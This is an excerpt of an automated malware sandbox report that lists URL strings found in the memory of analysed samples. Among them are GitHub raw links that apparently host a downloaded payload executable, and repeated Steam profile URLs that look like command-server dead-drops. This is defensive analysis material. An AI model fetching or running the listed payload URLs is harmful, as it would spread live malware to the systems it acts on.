Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: powershell.exe, 0000000D.00000002.1655620114.0000000005015000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: YYjRtxS70h.exeString found in binary or memory: https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://help.steampowered.com/en/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.1558683585.0000000006089000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1606744691.00000000061B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1672248672.0000000005F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: YYjRtxS70h.exe, 00000000.00000002.1791353691.0000000002A78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.c
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/O
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158701054.0000000000A41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/P
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/discussions/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.drString found in binary or memory: https://steamcommunity.com/market/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/o
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619#
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A46000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/badges
